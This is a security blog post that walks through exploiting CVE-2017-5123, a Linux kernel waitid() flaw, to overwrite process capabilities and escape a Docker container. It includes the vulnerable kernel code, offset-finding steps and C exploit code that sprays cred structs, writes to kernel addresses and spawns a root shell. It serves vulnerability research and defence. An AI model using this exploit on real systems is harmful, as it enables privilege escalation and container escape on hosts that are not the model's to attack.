This post describes how I exploited the waitid() vulnerability in order to modify the Linux capabilities of a Docker container to gain elevated privileges, and ultimately escape the container jail. If you want to see how Twistlock would stop this vulnerability in its tracks, check out my follow up blog.

But before we dive in, since an image is worth a thousand words, here is my exploit in action. It modifies the containerized process capabilities structure in memory, resulting in a gain of CAP_SYS_ADMIN and CAP_NET_ADMIN capabilities. This results in the ability to enable promiscuous mode on eth0 (docker bridge for the container):

Note that I have turned off Kernel ASLR for the recording, but it also works with KASLR as we can find the kernel base and the heap base by using the same vulnerability.

CVE-2017-5123 was published earlier this year on Oct 12 — it was a Linux kernel vulnerability in the waitid() syscall for 4.12-4.13 kernel versions. The waitid() syscall defined as:

int waitid(idtype_t idtype, id_t id, siginfo_t *infop, int options);

The vulnerability allows an attacker to write a partially-controlled data to kernel memory address of his choice. The kernel memory address can be provided as the infop pointer above. The pointer points to a struct siginfo described below. In this struct we can control several variables, specifically pid and status.

As you can see below, the control is rather indirect.

struct siginfo {
    int si_signo;
    int si_errno;
    int si_code;
    int padding;   // this remains unchanged by waitid
    int pid;       // process id
    int uid;       // user id
    int status;    // return code
}

Most of the values cannot be controlled by us or are limited in their size for our needs, however we can control the pid value by creating a lot of processes with the help of fork() or clone() until we hit the desired pid value. Still, we are limited by the PID_MAX value of the system, which is by default configured to be 32768 which equals to 0x8000 in hex.

Note: In a non-containerized environment we could elevate this number after changing our uid to 0 and gain root privileges, as we could modify /proc/sys/kernel/pid_max to any number.

Linux Capabilities

In this section I’ll focus on a short overview of Linux capabilities – what they are, how Docker uses them, and how they are represented in the memory.

The code snippet below is taken from linux/cred.h and is the definition of the credentials struct that each process has:

struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC    0x43736564
#define CRED_MAGIC_DEAD    0x44656144
#endif
    kuid_t        uid;        /* real UID of the task */
    kgid_t        gid;        /* real GID of the task */
    kuid_t        suid;        /* saved UID of the task */
    kgid_t        sgid;        /* saved GID of the task */
    kuid_t        euid;        /* effective UID of the task */
    kgid_t        egid;        /* effective GID of the task */
    kuid_t        fsuid;        /* UID for VFS ops */
    Kgid_t    fsgid; /* GID for VFS ops */
    Unsigned    securebits; /* SUID-less security management */
    Kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    Kernel_cap_t    cap_permitted;    /* caps we're permitted */
    Kernel_cap_t    cap_effective;    /* caps we can actually use */
    Kernel_cap_t    cap_bset; /* capability bounding set */
    kernel_cap_t    cap_ambient; /* Ambient capability set */


man capabilities:

Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled.
Capabilities are a per-thread attribute.

Linux capabilities are stored inside each process’s own cred struct and represented by a bitmask. For example all caps enabled would be represented by a bitmask of 0xFFFFFFFFFFFFFFFF.

Each capability provides a different set of permissions, for instance:

CAP_SYS_MODULE  – allows for loading & unloading kernel modules.

CAP_NET_ADMIN – allows for various network operations. For example entering promiscuous mode, interface configuration and more.

CAP_SYS_ADMIN – enables a range of system administration operations such as quotactl, mount, umount, swapon, setdomainname, ptrace and much more (this cap gives the most privileges and overloads others).

You can find the full list of CAPS over here.

Docker uses capabilities to provide a better isolation for containers. It simply drops capabilities that would enable container escape. For example, you will rarely see a container that is running out-of-the-box with any of the 3 capabilities above, as it would be a security concern if a container could access the network interface and sniff the traffic of other containers or the host itself, or if a user inside the container could mount directories on the host and load kernel modules.

Although it might be easier to build a ROP chain and call commit_creds(0) in order to gain root with full capabilities, in order to learn more about heap spraying, I decided to go with the blind exploitation method by spraying the kernel heap with thousands of struct creds like Federico did. The downside of the this exploit is that full caps are impossible to reach as we are not in control of what we are writing (we are limited to 0x8000) and the value of 0xFFFFFFFFFFFFFFFF is out of reach for us.

The vulnerability

The code snippet below is taken from kernel/exit.c and is in charge of handling the waitid() syscall:

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
        infop, int, options, struct rusage __user *, ru)
{
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;

    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
        if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
            return -EFAULT;
    }
    if (!infop)
        return err;

    if (!access_ok(VERIFY_WRITE, infop, sizeof(*infop)))
        return -EFAULT;

    user_access_begin();
    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user(info.cause, &infop->si_code, Efault);
    unsafe_put_user(info.pid, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop->si_status, Efault);
    user_access_end();
    return err;
Efault:
    user_access_end();
    return -EFAULT;
}

The vulnerability is that the highlighted access_ok() check, which ensures that the user specified pointer is in fact a user-space pointer, was missing in the waitid() syscall. Without this check a user can supply a kernel address pointer and the syscall will write to it without objections when executing unsafe_put_user.

As we already know – we can’t simply write whatever we want, but we will have to try to gain as much as we can within these limitations.

Info.status is a 32 bit int, but the value of status is constrained to 0 < status > 256 as we can see in the exit codes documentation, and as we already know pid is constrained by MAX_PID.

At this point we have the ability to write a value of pid :  0 < pid < 0x8000 to anywhere we want. The next challenge is to detect where we should write in order to successfully overwrite the desired values. We need to remember that the syscall will actually write 6 different fields each time we execute it, as there will be 6 executions of unsafe_put_user() So we will need to take into account the offset of pid inside the infop struct and use it to subtract that value from the target address that we want to write to, the target address is then passed into waitid() syscall as the infop pointer. Our main goal with this exploit is to overwrite the capabilities that Docker sets for us, thus gaining additional privileges and to escape the container.

Spray n’ Pray

I decided to take an approach similar to Federico, so I proceeded to spray the kernel heap with thousands of struct creds and then start guessing by writing to various addresses and pray to hit my target.

By picking a value that we can track such as uid (which we can track with getuid()).
We can, with a little bit a luck, pinpoint our struct cred location, after which we will be able to write to specific offsets in order to overwrite the capabilities, gid, euid and anything else we want.
But in order to do that we need to figure out the actual offsets, which we will do with the help of gdb:

As we can see, kuid_t is 4 bytes in size, as such if we found uid on 0xFFFF880023cc1004 than gid will be at 0xFFFF880023cc1008, 4 bytes above, and euid will be at 0xFFFF880023CC1014 which is 4*0x4=0x10 bytes above our uid address as illustrated in the diagram below.

So essentially in order to overwrite our caps we will have to write to:
address_of_uid+0x4*8 = address_of_uid+0x20 = address_of_cap_inheritable
Note: These addresses are relevant to my system, your addresses might differ.

In order to find out where our sprayed cred structs might land in the heap we will use gdb again and set a breakpoint on sys_getuid in order to break when our program calls getuid().

A few step commands after the breakpoint (it took 5 on my system) should reveal the cred struct address in the RAX register.

We can repeat that process of finding the struct for a number of forks in order to collect enough addresses and analyze the statistics of where the struct cred is most likely to be in the heap

So the plan is as follows:

  1. Spawn thousands of processes by calling fork() in order to create thousands of cred structs in the kernel heap and make each of the processes constantly check if its UID==0 by calling getuid()
  2. Start writing the value 0 to addresses to which the struct cred->uid might land
  3. If and when one of our forked processes gets uid==0, it means that we have successfully overwritten the uid value with our guesses from step 2. Now we can overwrite the rest of the cred struct and change caps by writing to the offsets that we determined.

Our dirty exploit will be something to the effect of:

void writecaps(char *addr,unsigned long value){
while(1) {
      int pid = clone(exit_func, &new_stack[5000], CLONE_VM | SIGCHLD, NULL);
      if (!pid) {
        exit(0);
      }
      if (pid == value) {
        syscall(SYS_waitid, P_PID, pid, addr, WEXITED, NULL);
        break;
      }
}

void spraynpray(){
pid_t pid;
FILE *f;
char *argv[] = {"/bin/sh", NULL};
for (int i=0;i<5000;i++)
{
    pid = fork();
    if (pid==0)
    { // child process
  while (1) {
    
    if (*glob_var==1) {
      syscall(SYS_exit, 0);
    }
    if (getuid() == 0){
        //FOUND!!
    printf("[+] Got UID: 0 !\n");
     *glob_var = 1;
     writecaps((char *)finalcapsaddress,value);
    printf("Done, spawning a shell \n");
    execve("/bin/sh", argv, NULL);
    }
}
    }

    else if(pid<0)
    {
        printf("failed to fork");
    }

    else //parent process
    {

    }
}
}

void swapuid(){

    char* i,p;
    while(*glob_var!=1)
    {
    for(i = (char *)0xffff8800321b4004; ; i+=0xc0)
        {
        if(*glob_var==1)
            {
            break;
            }
        printf("trying %p\n",i);
        syscall(__NR_waitid, P_PID, 0,(siginfo_t *)i, WEXITED, NULL);
        sleep(1);
        }
    }
munmap(glob_var, sizeof *glob_var);
printf("Found uid on %p\n",i-0xc0);
sleep(10000);
}

int main(void)
{
    glob_var = mmap(NULL, sizeof *glob_var, PROT_READ | PROT_WRITE,
                    MAP_SHARED | MAP_ANONYMOUS, -1, 0);

    *glob_var = 0;

unsigned long* base = findbase();
    findheapbase();
    spraynpray();
    swapuid();
}

After analyzing my system (Ubuntu 17.10,Kernel 4.13.0-15, arch x86-64), I found a couple of areas where it seemed that cred struct is more likely to land in about 70% of the executions, but there is still a risk of crashing the machine because we may overwrite something important in the kernel.

Conclusion

In 2017 alone, 434 linux kernel exploits where found, and as you have seen in this post, kernel exploits can be devastating for containerized environments. This is because containers share the same kernel as the host, thus trusting the built-in protection mechanisms alone isn’t sufficient. Make sure your kernel is always updated on all of your production hosts.

Thank you for reading and don’t forget to follow us @TwistlockLabs.

Big credits to Federico Bento for pointing some things out and to Chris Salls for his Chrome sandbox escape exploit; my exploitation is heavily based on their work.